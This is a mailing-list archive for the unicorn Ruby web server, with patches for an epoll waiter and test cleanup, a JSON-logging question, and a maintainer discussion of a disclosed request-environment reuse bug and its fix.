+	VALUE cWaiter = rb_define_class_under(mUnicorn, "Waiter", rb_cIO);
+	rb_define_singleton_method(cWaiter, "prep_readers", prep_readers, 1);
+	rb_define_method(cWaiter, "get_readers", get_readers, 3);
+#endif
+}
diff --git a/ext/unicorn_http/extconf.rb b/ext/unicorn_http/extconf.rb
index 46070a7..13dec41 100644
--- a/ext/unicorn_http/extconf.rb
+++ b/ext/unicorn_http/extconf.rb
@@ -38,4 +38,5 @@
   message("no, needs Ruby 2.6+\n")
 end
 
+have_func('epoll_create1', %w(sys/epoll.h))
 create_makefile("unicorn_http")
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index e934a32..605b23f 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -12,6 +12,7 @@
 #include "common_field_optimization.h"
 #include "global_variables.h"
 #include "c_util.h"
+#include "epollexclusive.h"
 
 void init_unicorn_httpdate(void);
 
@@ -1017,5 +1018,7 @@ void Init_unicorn_http(void)
   id_clear = rb_intern("clear");
 #endif
   id_is_chunked_p = rb_intern("is_chunked?");
+
+  init_epollexclusive(mUnicorn);
 }
 #undef SET_GLOBAL
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 7f33f98..21f2a05 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -685,7 +685,6 @@ def init_worker_process(worker)
     LISTENERS.each { |sock| sock.close_on_exec = true }
 
     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
-    self.timeout /= 2.0 # halve it for select()
     @config = nil
     build_app! unless preload_app
     @after_fork = @listener_opts = @orig_app = nil
@@ -705,11 +704,22 @@ def reopen_worker_logs(worker_nr)
     exit!(77) # EX_NOPERM in sysexits.h
   end
 
+  def prep_readers(readers)
+    wtr = Unicorn::Waiter.prep_readers(readers)
+    @timeout *= 500 # to milliseconds for epoll, but halved
+    wtr
+  rescue
+    require_relative 'select_waiter'
+    @timeout /= 2.0 # halved for IO.select
+    Unicorn::SelectWaiter.new
+  end
+
   # runs inside each forked worker, this sits around and waits
   # for connections and doesn't die until the parent dies (or is
   # given a INT, QUIT, or TERM signal)
   def worker_loop(worker)
     readers = init_worker_process(worker)
+    waiter = prep_readers(readers)
     reopen = false
 
     # this only works immediately if the master sent us the signal
@@ -722,8 +732,7 @@ def worker_loop(worker)
     begin
       reopen = reopen_worker_logs(worker.nr) if reopen
       worker.tick = time_now.to_i
-      tmp = ready.dup
-      while sock = tmp.shift
+      while sock = ready.shift
         # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
         # but that will return false
         if client = sock.kgio_tryaccept
@@ -735,7 +744,7 @@ def worker_loop(worker)
 
       # timeout so we can .tick and keep parent from SIGKILL-ing us
       worker.tick = time_now.to_i
-      ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
+      waiter.get_readers(ready, readers, @timeout)
     rescue => e
       redo if reopen && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
diff --git a/lib/unicorn/select_waiter.rb b/lib/unicorn/select_waiter.rb
new file mode 100644
index 0000000..cb84aab
--- /dev/null
+++ b/lib/unicorn/select_waiter.rb
@@ -0,0 +1,6 @@
+# fallback for non-Linux and Linux <4.5 systems w/o EPOLLEXCLUSIVE
+class Unicorn::SelectWaiter # :nodoc:
+  def get_readers(ready, readers, timeout) # :nodoc:
+    ret = IO.select(readers, nil, nil, timeout) and ready.replace(ret[0])
+  end
+end
diff --git a/t/test-lib.sh b/t/test-lib.sh
index 7f97958..e70d0c6 100644
--- a/t/test-lib.sh
+++ b/t/test-lib.sh
@@ -94,7 +94,8 @@ check_stderr () {
 	set +u
 	_r_err=${1-${r_err}}
 	set -u
-	if grep -v $T $_r_err | grep -i Error
+	if grep -v $T $_r_err | grep -i Error | \
+		grep -v NameError.*Unicorn::Waiter
 	then
 		die "Errors found in $_r_err"
 	elif grep SIGKILL $_r_err
diff --git a/test/unit/test_waiter.rb b/test/unit/test_waiter.rb
new file mode 100644
index 0000000..0995de2
--- /dev/null
+++ b/test/unit/test_waiter.rb
@@ -0,0 +1,34 @@
+require 'test/unit'
+require 'unicorn'
+require 'unicorn/select_waiter'
+class TestSelectWaiter < Test::Unit::TestCase
+
+  def test_select_timeout # n.b. this is level-triggered
+    sw = Unicorn::SelectWaiter.new
+    IO.pipe do |r,w|
+      sw.get_readers(ready = [], [r], 0)
+      assert_equal [], ready
+      w.syswrite '.'
+      sw.get_readers(ready, [r], 1000)
+      assert_equal [r], ready
+      sw.get_readers(ready, [r], 0)
+      assert_equal [r], ready
+    end
+  end
+
+  def test_linux # ugh, also level-triggered, unlikely to change
+    IO.pipe do |r,w|
+      wtr = Unicorn::Waiter.prep_readers([r])
+      wtr.get_readers(ready = [], [r], 0)
+      assert_equal [], ready
+      w.syswrite '.'
+      wtr.get_readers(ready = [], [r], 1000)
+      assert_equal [r], ready
+      wtr.get_readers(ready = [], [r], 1000)
+      assert_equal [r], ready, 'still ready (level-triggered :<)'
+      assert_nil wtr.close
+    end
+  rescue SystemCallError => e
+    warn "#{e.message} (#{e.class})"
+  end if Unicorn.const_defined?(:Waiter)
+end

^ permalink raw reply related	[relevance 1%]

* Re: Formatting unicorn logs in json format for $stderr
  2021-07-06 10:41  0% ` Eric Wong
@ 2021-07-06 23:21  0%   ` Cenon Del Rosario
  0 siblings, 0 replies; 200+ results
From: Cenon Del Rosario @ 2021-07-06 23:21 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> I suspect that needs "logger()" around it, like so:
>     logger(Logger.new($stderr).tap do |newlgr|
>       newlgr.formatter = JsonLogFormatter.new
>     end)

Sorry for incomplete code snippets but yes I do have this (I was doing
it for either stdout or stderr) and it did not make a difference.

On Tue, 6 Jul 2021 at 20:41, Eric Wong <e@80x24.org> wrote:
>
> Cenon Del Rosario <cdelrosario@publishing.nine.com.au> wrote:
> > Hi,
> >
> > I am using rails 3.2.22 / ruby 2.1.8 and am trying to reformat the
> > unicorn log output from stderr into json format and have had partial
> > success.
> >
> > I have a basic json formatter:
> > class JsonLogFormatter < Logger::Formatter
> >   def call(severity, datetime, progname, msg)
> >     log_msg = {
> >       time: "#{datetime}",
> >       severity: "#{severity}",
> >       source: "#{progname}"
> >     }
> >     msg.is_a?(Hash) ? log_msg.merge!(msg) : log_msg.merge!(message: "#{msg}")
> >     "#{log_msg.to_json}\n"
> >   end
> > end
> >
> > I have this in my unicorn config:
> > Logger.new($stderr).tap do |newlgr|
> >   newlgr.formatter = JsonLogFormatter.new
> > end
>
> I suspect that needs "logger()" around it, like so:
>
>     logger(Logger.new($stderr).tap do |newlgr|
>       newlgr.formatter = JsonLogFormatter.new
>     end)
>
> cf. https://urldefense.com/v3/__https://yhbt.net/unicorn/Unicorn/Configurator.html*method-i-logger__;Iw!!LBk0ZmAmG_H4m2o!9io6HA1SNuu8dkgdMRtwNuyjMJZwMCtZCUQsYqfcIvMvaFlkjfE17UHZSB15oiNN9YiW_Lm-hw$
>
> > For the most part it works and I get the stdout and stderr in json but
> > I also see some other non-json formatted messages, for example:
> > {"time":"2021-07-06 17:14:01
> > +1000","severity":"INFO","source":"","message":"Started GET \"/admin\"
> > for 127.0.0.1 at 2021-07-06 17:14:01 +1000"}
> > 127.0.0.1 - - [06/Jul/2021 17:14:01] "GET /admin HTTP/1.1" 301 102 0.4243
>
> I suspect one of those lines could be the result of
> Rack::CommonLogger from RACK_ENV=deployment or similar
> (which matched "rackup" defaults back in 2009).
>
> Personally, I always used something non-standard like "RACK_ENV=none"
> to disable all default Rack middleware (--no-default-middleware
> exists nowadays, too).
>
> > It seems that rails logs are working and then the unicorn process
> > itself is outputting its own logs because I can see duplicates of the
> > same log message one in json and the other in plain text.
> >
> > Just want to know if there is a way to get this working consistently?
>
> I've never used the "logger" directive much myself; maybe others
> here can chime in with experience using non-standard loggers.

-- 
The information contained in this e-mail message and any accompanying files 
is or may be confidential. If you are not the intended recipient, any use, 
dissemination, reliance, forwarding, printing or copying of this e-mail or 
any attached files is unauthorised. This e-mail is subject to copyright. No 
part of it should be reproduced, adapted or communicated without the 
written consent of the copyright owner. If you have received this e-mail in 
error please advise the sender immediately by return e-mail or telephone 
and delete all copies. Nine Group does not guarantee the accuracy or 
completeness of any information contained in this e-mail or attached files. 
Internet communications are not secure, therefore Nine Group does not 
accept legal responsibility for the contents of this message or attached 
files.

^ permalink raw reply	[relevance 0%]

* Re: Formatting unicorn logs in json format for $stderr
  2021-07-06  7:22  2% Formatting unicorn logs in json format for $stderr Cenon Del Rosario
@ 2021-07-06 10:41  0% ` Eric Wong
  2021-07-06 23:21  0%   ` Cenon Del Rosario
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2021-07-06 10:41 UTC (permalink / raw)
  To: Cenon Del Rosario; +Cc: unicorn-public

Cenon Del Rosario <cdelrosario@publishing.nine.com.au> wrote:
> Hi,
> 
> I am using rails 3.2.22 / ruby 2.1.8 and am trying to reformat the
> unicorn log output from stderr into json format and have had partial
> success.
> 
> I have a basic json formatter:
> class JsonLogFormatter < Logger::Formatter
>   def call(severity, datetime, progname, msg)
>     log_msg = {
>       time: "#{datetime}",
>       severity: "#{severity}",
>       source: "#{progname}"
>     }
>     msg.is_a?(Hash) ? log_msg.merge!(msg) : log_msg.merge!(message: "#{msg}")
>     "#{log_msg.to_json}\n"
>   end
> end
> 
> I have this in my unicorn config:
> Logger.new($stderr).tap do |newlgr|
>   newlgr.formatter = JsonLogFormatter.new
> end

I suspect that needs "logger()" around it, like so:

    logger(Logger.new($stderr).tap do |newlgr|
      newlgr.formatter = JsonLogFormatter.new
    end)

cf. https://yhbt.net/unicorn/Unicorn/Configurator.html#method-i-logger

> For the most part it works and I get the stdout and stderr in json but
> I also see some other non-json formatted messages, for example:
> {"time":"2021-07-06 17:14:01
> +1000","severity":"INFO","source":"","message":"Started GET \"/admin\"
> for 127.0.0.1 at 2021-07-06 17:14:01 +1000"}
> 127.0.0.1 - - [06/Jul/2021 17:14:01] "GET /admin HTTP/1.1" 301 102 0.4243

I suspect one of those lines could be the result of
Rack::CommonLogger from RACK_ENV=deployment or similar
(which matched "rackup" defaults back in 2009).

Personally, I always used something non-standard like "RACK_ENV=none"
to disable all default Rack middleware (--no-default-middleware
exists nowadays, too).

> It seems that rails logs are working and then the unicorn process
> itself is outputting its own logs because I can see duplicates of the
> same log message one in json and the other in plain text.
> 
> Just want to know if there is a way to get this working consistently?

I've never used the "logger" directive much myself; maybe others
here can chime in with experience using non-standard loggers.

^ permalink raw reply	[relevance 0%]

* Formatting unicorn logs in json format for $stderr
@ 2021-07-06  7:22  2% Cenon Del Rosario
  2021-07-06 10:41  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Cenon Del Rosario @ 2021-07-06  7:22 UTC (permalink / raw)
  To: unicorn-public

Hi,

I am using rails 3.2.22 / ruby 2.1.8 and am trying to reformat the
unicorn log output from stderr into json format and have had partial
success.

I have a basic json formatter:
class JsonLogFormatter < Logger::Formatter
  def call(severity, datetime, progname, msg)
    log_msg = {
      time: "#{datetime}",
      severity: "#{severity}",
      source: "#{progname}"
    }
    msg.is_a?(Hash) ? log_msg.merge!(msg) : log_msg.merge!(message: "#{msg}")
    "#{log_msg.to_json}\n"
  end
end

I have this in my unicorn config:
Logger.new($stderr).tap do |newlgr|
  newlgr.formatter = JsonLogFormatter.new
end

I have this in my application.rb:
Logger.new(STDOUT).tap do |logr|
  JsonLogFormatter.new.tap do |frmtr|
    logr.formatter = frmtr
    Rails.logger = config.logger = logr
  end
end

For the most part it works and I get the stdout and stderr in json but
I also see some other non-json formatted messages, for example:
{"time":"2021-07-06 17:14:01
+1000","severity":"INFO","source":"","message":"Started GET \"/admin\"
for 127.0.0.1 at 2021-07-06 17:14:01 +1000"}
127.0.0.1 - - [06/Jul/2021 17:14:01] "GET /admin HTTP/1.1" 301 102 0.4243

It seems that rails logs are working and then the unicorn process
itself is outputting its own logs because I can see duplicates of the
same log message one in json and the other in plain text.

Just want to know if there is a way to get this working consistently?

Thank you,
Cenon Del Rosario

-- 
The information contained in this e-mail message and any accompanying files 
is or may be confidential. If you are not the intended recipient, any use, 
dissemination, reliance, forwarding, printing or copying of this e-mail or 
any attached files is unauthorised. This e-mail is subject to copyright. No 
part of it should be reproduced, adapted or communicated without the 
written consent of the copyright owner. If you have received this e-mail in 
error please advise the sender immediately by return e-mail or telephone 
and delete all copies. Nine Group does not guarantee the accuracy or 
completeness of any information contained in this e-mail or attached files. 
Internet communications are not secure, therefore Nine Group does not 
accept legal responsibility for the contents of this message or attached 
files.

^ permalink raw reply	[relevance 2%]

* [PATCH] test/test_helper: only unlink redirected logs from parent
@ 2021-03-13  2:08  3% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2021-03-13  2:08 UTC (permalink / raw)
  To: unicorn-public

We don't want at_exit firing in child processes and never wanted
it.  This is apparently a long standing bug in the tests that
only started causing test_worker_dies_on_dead_master failures
for me.  I assume it's only showing up now for me due to kernel
scheduler changes, since I've been using the same 4-core CPU for
~11 years, now.
---
 test/test_helper.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/test/test_helper.rb b/test/test_helper.rb
index 974d2f2..ba5ef16 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -42,6 +42,7 @@
 def redirect_test_io
   orig_err = STDERR.dup
   orig_out = STDOUT.dup
+  rdr_pid = $$
   new_out = File.open("test_stdout.#$$.log", "a")
   new_err = File.open("test_stderr.#$$.log", "a")
   new_out.sync = new_err.sync = true
@@ -59,8 +60,10 @@ def redirect_test_io
   STDERR.sync = STDOUT.sync = true
 
   at_exit do
-    File.unlink(new_out.path) rescue nil
-    File.unlink(new_err.path) rescue nil
+    if rdr_pid == $$
+      File.unlink(new_out.path) rescue nil
+      File.unlink(new_err.path) rescue nil
+    end
   end
 
   begin

^ permalink raw reply related	[relevance 3%]

* Re: Potential Unicorn vulnerability
       [not found]       ` <7F6FD017-7802-4871-88A3-1E03D26D967C@github.com>
@ 2021-03-12  9:41  1%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2021-03-12  9:41 UTC (permalink / raw)
  To: Dirkjan Bussink; +Cc: John Crepezzi, Kevin Sawicki, unicorn-public

[-- Attachment #1: Type: text/plain, Size: 6397 bytes --]

Dirkjan Bussink <dbussink@github.com> wrote:
> Hello Eric,
> 
> > On 11 Mar 2021, at 04:02, Eric Wong <normalperson@yhbt.net> wrote:
> > 
> > Thanks for reaching out.  Fwiw, I prefer if everything were made
> > public right away, but I'll leave it up to you if you're not
> > comfortable with it.
> > 
> > I don't know much about security, anwyays; and don't like
> > classifying bugs (or classifying anything)...
> 
> We reached out privately first out of care and to follow best practices
> around coordinated disclosure, in case you considered this a security
> vulnerability. We have no objections to moving this to the public mailing
> list. We are viewing this patch as a proactive hardening against race
> conditions more so than a vulnerability. 

OK, I'm adding unicorn-public@yhbt.net to the Cc: of this mail.

Personally, I prefer everything be reported publicly ASAP.
There's a constant threat of power/network failures from
disasters and such that could cause messages to be delayed
too long or indefinitely.

> We are also reaching out to a private Rails Security coordination channel
> that we’re a part of to raise awareness of this behavior so other Unicorn
> users in this group can look for similar issues in their code. 

OK.

> To move this discussion to the public list, would you prefer that you move
> this thread publicly, or that we resend the message or forward it to the
> public mailing list? 

Attached are the initial two (previously private) emails in this
thread, so no need to resend.  They have the correct
message/rfc822 MIME type set so they should be readable from
most MUAs and mail archives.

> > Ouch, so the hijack check we had in HttpParser_clear didn't fire...
> 
> Yes, to our understanding it only would fire if explicitly set and that
> doesn’t happen here.
> 
> >> While we understand and appreciate that Unicorn is not a multi-threaded web
> >> server, it feels like using the same `Hash` object between requests
> >> introduces the chance that a dependency like an external gem may use threads
> >> and thus potentially leak information between requests.
> > 
> > Yes, there's likely problems in trying to use threads with a
> > codebase that was only intended to be single-threaded.  And
> > using Thread.current[...] here wouldn't have made a. difference.
> 
> For us it was also the difference between “requests are handled single threaded”
> vs “you can’t use threads for anything else either.” We were totally aware of the
> first, but the latter seems more accidental and has a much broader impact. 

Agreed.

> > I worry some endpoints out there will suffer performance
> > degradation.  Expensive endpoints probably won't notice,
> > but maybe the fastest ones will...
> 
> That is a good point, but I think in practice most users do enough in most
> requests that the trade off is totally worth it. At least for us it definitely
> is. Maybe it would be an option to make the sharing somehow opt-in instead of
> default behavior? So that by default the safe behavior is used, but for those
> that want to, they can opt into the sharing if they know their app is safe
> enough to work with that. 

I'm not in favor of new options since they add support costs
and increase the learning/maintenance curve.

What I've been thinking about is bumping the major version to 6.0

Although our internals are technically not supported stable API,
there may be odd stuff out there similar to OobGC that uses
instance_variable_get or similar things to reach into internals.
Added with the fact our internals haven't changed in many years;
I'm inclined to believe there are other OobGC-like things out
there that can break.

Also, with 6.0; users who completely avoid Threads can keep
using 5.x, while others can use 6.x

> >> For the sake of transparency to our users, we plan on publishing a public
> >> post next week on how this was part of the larger series of bugs that had a
> >> security impact at GitHub. We've also attached a suggested patch that removes
> >> the environment sharing, which is what we're running right now to reduce the
> >> risk of this ever happening again.
> > 
> > Did you measure performance degradations in any endpoints you have?
> 
> We did measure and there were zero noticeable performance degradations. That’s
> also because all our requests do a bunch of work and are not direct Rack apps,
> and use stuff like Rails or Sinatra. Those all usually wrap the `env` hash
> anyway with their own per request object and there’s a lot of other allocations
> happening anyway.
> 
> In microbenchmarks we could see a difference, but even there, at least for us,
> we’d gladly pay the performance price for the safety if we’d have any endpoints
> where it would be measurable. 

OK.  Fwiw, there's still some stones left unturned that could
recover the lost speed if somebody _really_ cares for it(*)

(*) String#clear on response header buffer, swapping Ragel
    for a faster HTTP parser, ...

> All in all, I think here that a safe default would be helpful for users, as
> mentioned earlier, and that maybe for those cases where the latest performance
> bit matters, the existing behavior could be opted into. Whether this option is
> worth it from a maintenance standpoint is something you’re better able to answer
> than we are though.

It's probably OK and I'm inclined to accept your patch for 6.0.

At this point, I'm more worried about potential breakage of some
3rd-party OobGC-like thing that reaches deep into our internals.

Btw, did you consider replacing the @request HttpRequest object
entirely instead of the env and buf elements?
I suppose that's more allocations, still; but could've
been a smaller change.

> > I'll see about finding a less-noisy/overloaded system to run
> > benchmarks against...
> > 
> > I noticed some of the OobGC tests in t/ were failing (patch below),
> > but few users use the that version of OobGC.
> 
> I wasn’t easily able to run the entire suite, but only parts of it which is why
> I didn’t have a complete fix there. I can add this to the patch then.

Oops, was that the integration tests in t/* ?
They can run separately via "make test-integration"
(I never trusted some Ruby behaviors to remain stable,
 so I started writing tests in Bourne shell).

<snip> I have nothing to add to the rest of the mail

unicorn-public readers: see attachments

[-- Attachment #2: 0001-potential-unicorn-vulnerability.eml --]
[-- Type: message/rfc822, Size: 12105 bytes --]

[-- Attachment #2.1.1: Type: text/plain, Size: 2813 bytes --]

Hello Eric,

We're reaching out privately first on what we think could be classified as a
security issue in Unicorn. Since there may be other similarly impacted users,
this is out of an abundance of caution before sending it to the public
Unicorn mailing list.

The issue at hand is that the environment sharing and reuse between requests
in Unicorn, combined with other non thread safe code, resulted in a security
vulnerability where a very small number of user sessions tracked through
cookies got misrouted. For this reason, we logged everyone out of GitHub, see
also https://github.blog/2021-03-08-github-security-update-a-bug-related-to-handling-of-authenticated-sessions/. 

The unsafe background thread code we had ended up triggering an exception at
rare times and the exception tracking logic was using a deferred block
executed through a Ruby Proc to gather information, including things from the
request at the time the logic started.

That thread captured something from the cookie jar among other things, and
the following code in Rack memoized that into the (shared) environment.

From https://github.com/rack/rack/blob/2.1.4/lib/rack/request.rb#L219-L229

def cookies
  hash = fetch_header(RACK_REQUEST_COOKIE_HASH) do |k|
    set_header(k, {})
  end
  string = get_header HTTP_COOKIE

  return hash if string == get_header(RACK_REQUEST_COOKIE_STRING)
  hash.replace Utils.parse_cookies_header string
  set_header(RACK_REQUEST_COOKIE_STRING, string)
  hash
end

Because of the environment sharing, the memoization ended up overriding what
would be memoized (with the RACK_REQUEST_COOKIE_STRING key) for the new
request and because a specific session cookie was bumped then with a new
timeout on each request, the wrong session cookie was serialized.

While we understand and appreciate that Unicorn is not a multi-threaded web
server, it feels like using the same `Hash` object between requests
introduces the chance that a dependency like an external gem may use threads
and thus potentially leak information between requests.

For the sake of transparency to our users, we plan on publishing a public
post next week on how this was part of the larger series of bugs that had a
security impact at GitHub. We've also attached a suggested patch that removes
the environment sharing, which is what we're running right now to reduce the
risk of this ever happening again.

We hope you're open to collaborating on a fix prior to any public detailed
disclosure of how this request environment sharing could lead to security
issues, if you feel that is desired. 

I’ve added John & Kevin here on the CC since they’ve also worked on this and
that way we have some better timezone spread on our side if needed. 

Cheers,

Dirkjan Bussink


[-- Attachment #2.1.2: 0001-Drop-reuse-of-Ruby-level-objects.patch --]
[-- Type: application/octet-stream, Size: 4067 bytes --]

From 44aa6b056e1b24d42ab3efba738b38f4cd54a068 Mon Sep 17 00:00:00 2001
From: Dirkjan Bussink <d.bussink@gmail.com>
Date: Mon, 8 Mar 2021 09:51:09 +0100
Subject: [PATCH] Drop reuse of Ruby level objects

Remove the reuse of environment and the buffer as Ruby level objects.
Reusing these is very risky in the context of running any other threads
within the unicorn process, also for threads that run background tasks.

This lead to a significant security incident where the problems would
not have happened if there was no reuse of the `env` object. From a
safety perspective, this also removes reuse of the buffer object as it's
also a Ruby object and could be grabbed and retained outside of the http
parsing logic.

The downside here is that we allocate two extra objects on each request,
but that is worth the trade off here and the security risk we otherwise
would carry to leaking wrong and incorrect data.
---
 ext/unicorn_http/extconf.rb      |  1 -
 ext/unicorn_http/unicorn_http.rl | 30 +++---------------------------
 test/unit/test_http_parser.rb    |  3 +++
 3 files changed, 6 insertions(+), 28 deletions(-)

diff --git a/ext/unicorn_http/extconf.rb b/ext/unicorn_http/extconf.rb
index 95514bc..7e4775c 100644
--- a/ext/unicorn_http/extconf.rb
+++ b/ext/unicorn_http/extconf.rb
@@ -10,7 +10,6 @@
 have_macro("SIZEOF_SIZE_T", "ruby.h") or check_sizeof("size_t", "sys/types.h")
 have_macro("SIZEOF_LONG", "ruby.h") or check_sizeof("long", "sys/types.h")
 have_func("rb_str_set_len", "ruby.h") or abort 'Ruby 1.9.3+ required'
-have_func("rb_hash_clear", "ruby.h") # Ruby 2.0+
 have_func("gmtime_r", "time.h")
 
 message('checking if String#-@ (str_uminus) dedupes... ')
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 21e09d6..9904d85 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -65,18 +65,6 @@ struct http_parser {
 static ID id_set_backtrace, id_is_chunked_p;
 static VALUE cHttpParser;
 
-#ifdef HAVE_RB_HASH_CLEAR /* Ruby >= 2.0 */
-#  define my_hash_clear(h) (void)rb_hash_clear(h)
-#else /* !HAVE_RB_HASH_CLEAR - Ruby <= 1.9.3 */
-
-static ID id_clear;
-
-static void my_hash_clear(VALUE h)
-{
-  rb_funcall(h, id_clear, 0);
-}
-#endif /* HAVE_RB_HASH_CLEAR */
-
 static void finalize_header(struct http_parser *hp);
 
 static void parser_raise(VALUE klass, const char *msg)
@@ -445,6 +433,8 @@ static void http_parser_init(struct http_parser *hp)
   hp->cont = Qfalse; /* zero on MRI, should be optimized away by above */
   %% write init;
   hp->cs = cs;
+  hp->buf = rb_str_new(NULL, 0);
+  hp->env = rb_hash_new();
 }
 
 /** exec **/
@@ -628,8 +618,6 @@ static VALUE HttpParser_init(VALUE self)
   struct http_parser *hp = data_get(self);
 
   http_parser_init(hp);
-  hp->buf = rb_str_new(NULL, 0);
-  hp->env = rb_hash_new();
 
   return self;
 }
@@ -643,16 +631,7 @@ static VALUE HttpParser_init(VALUE self)
  */
 static VALUE HttpParser_clear(VALUE self)
 {
-  struct http_parser *hp = data_get(self);
-
-  /* we can't safely reuse .buf and .env if hijacked */
-  if (HP_FL_TEST(hp, HIJACK))
-    return HttpParser_init(self);
-
-  http_parser_init(hp);
-  my_hash_clear(hp->env);
-
-  return self;
+  return HttpParser_init(self);
 }
 
 static void advance_str(VALUE str, off_t nr)
@@ -1025,9 +1004,6 @@ void Init_unicorn_http(void)
   id_set_backtrace = rb_intern("set_backtrace");
   init_unicorn_httpdate();
 
-#ifndef HAVE_RB_HASH_CLEAR
-  id_clear = rb_intern("clear");
-#endif
   id_is_chunked_p = rb_intern("is_chunked?");
 }
 #undef SET_GLOBAL
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 697af44..d3f9ae7 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -33,6 +33,9 @@ def test_parse_simple
     parser.clear
     req.clear
 
+    req = parser.env
+    http = parser.buf
+
     http << "G"
     assert_nil parser.parse
     assert_equal "G", http
-- 
2.30.1


[-- Attachment #3: 0002-re-potential-unicorn-vulnerability.eml --]
[-- Type: message/rfc822, Size: 5635 bytes --]

From: Eric Wong <normalperson@yhbt.net>
To: Dirkjan Bussink <dbussink@github.com>
Cc: John Crepezzi <seejohnrun@github.com>, Kevin Sawicki <kevinsawicki@github.com>
Subject: Re: Potential Unicorn vulnerability
Date: Thu, 11 Mar 2021 03:02:50 +0000
Message-ID: <20210311030250.GA1266@dcvr>

Dirkjan Bussink <dbussink@github.com> wrote:
> Hello Eric,
> 
> We're reaching out privately first on what we think could be classified as a
> security issue in Unicorn. Since there may be other similarly impacted users,
> this is out of an abundance of caution before sending it to the public
> Unicorn mailing list.

Thanks for reaching out.  Fwiw, I prefer if everything were made
public right away, but I'll leave it up to you if you're not
comfortable with it.

I don't know much about security, anwyays; and don't like
classifying bugs (or classifying anything)...

<snip>

> That thread captured something from the cookie jar among other things, and
> the following code in Rack memoized that into the (shared) environment.

Ouch, so the hijack check we had in HttpParser_clear didn't fire...

<snip>

> While we understand and appreciate that Unicorn is not a multi-threaded web
> server, it feels like using the same `Hash` object between requests
> introduces the chance that a dependency like an external gem may use threads
> and thus potentially leak information between requests.

Yes, there's likely problems in trying to use threads with a
codebase that was only intended to be single-threaded.  And
using Thread.current[...] here wouldn't have made a. difference.

I worry some endpoints out there will suffer performance
degradation.  Expensive endpoints probably won't notice,
but maybe the fastest ones will...

`buf' is particularly worrying to me since it's a 16384-byte
allocation for a socket read on headers that could amount
to lots of GC pressure and hurt locality all around.

env['rack.input'] may also hold onto `buf', too, since
input is lazily-consumed (though it may be possible to
workaround that...).

Losing `env' is probably less worrying since keys are all
fstrings in modern Rubies.  Though losing the backing store (and
not having rb_hash_new_with_size in the C API) would mean more
rehashing with many headers.

The simple Rack apps I worked on back in-the-day which
benefitted from these object-reuse optimizations are unlikely to
be upgraded to newer versions of unicorn.  Of course, there
may be other similar Rack apps out there that depend on these...

> For the sake of transparency to our users, we plan on publishing a public
> post next week on how this was part of the larger series of bugs that had a
> security impact at GitHub. We've also attached a suggested patch that removes
> the environment sharing, which is what we're running right now to reduce the
> risk of this ever happening again.

Did you measure performance degradations in any endpoints you have?

I'll see about finding a less-noisy/overloaded system to run
benchmarks against...

I noticed some of the OobGC tests in t/ were failing (patch below),
but few users use the that version of OobGC.

Also, t/t0200-rack-hijack.sh would go away.

> We hope you're open to collaborating on a fix prior to any public detailed
> disclosure of how this request environment sharing could lead to security
> issues, if you feel that is desired. 

Sure, as long as everything is done via plain-text email so
I won't need working graphics drivers or modern hardware :>

Along the same lines, would you be OK with this entire mail thread
(including all mail headers) being eventually published in the
public mailbox at http://ou63pmih66umazou.onion/unicorn-public/
and https://yhbt.net/unicorn-public/ ?

> I’ve added John & Kevin here on the CC since they’ve also worked on this and
> that way we have some better timezone spread on our side if needed. 

OK, I'm around/awake at pretty random times.

Aforementioned OomGC change:
-------8<-------
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index 3b2f488..91a8e51 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -60,7 +60,6 @@ def self.new(app, interval = 5, path = %r{\A/})
     self.const_set :OOBGC_INTERVAL, interval
     ObjectSpace.each_object(Unicorn::HttpServer) do |s|
       s.extend(self)
-      self.const_set :OOBGC_ENV, s.instance_variable_get(:@request).env
     end
     app # pretend to be Rack middleware since it was in the past
   end
@@ -68,9 +67,10 @@ def self.new(app, interval = 5, path = %r{\A/})
   #:stopdoc:
   def process_client(client)
     super(client) # Unicorn::HttpServer#process_client
-    if OOBGC_PATH =~ OOBGC_ENV['PATH_INFO'] && ((@@nr -= 1) <= 0)
+    env = instance_variable_get(:@request).env
+    if OOBGC_PATH =~ env['PATH_INFO'] && ((@@nr -= 1) <= 0)
       @@nr = OOBGC_INTERVAL
-      OOBGC_ENV.clear
+      env.clear
       disabled = GC.enable
       GC.start
       GC.disable if disabled

^ permalink raw reply related	[relevance 1%]

* Re: [RFC] http_response: ignore invalid header response characters
  2021-01-06 17:53  2% ` Eric Wong
@ 2021-01-13 23:20  1%   ` Sam Sanoop
  0 siblings, 0 replies; 200+ results
From: Sam Sanoop @ 2021-01-13 23:20 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Hi, The researcher didn’t test it with Ngnix, his configuration
according to the report was

server: unicorn (<= latest)
Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production


But reading http://blog.volema.com/nginx-insecurities.html, CRLF can
be allowed if a user is using $uri variables within their NGINX
config. So conditions within NGNIX would need to be met.

Regarding the hackerone report, here is a txt version of the report:


ooooooo_q-----------------

Hello,
I was looking at the change log
(https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2)
for CVE-2020-8185 and found another problem existed.

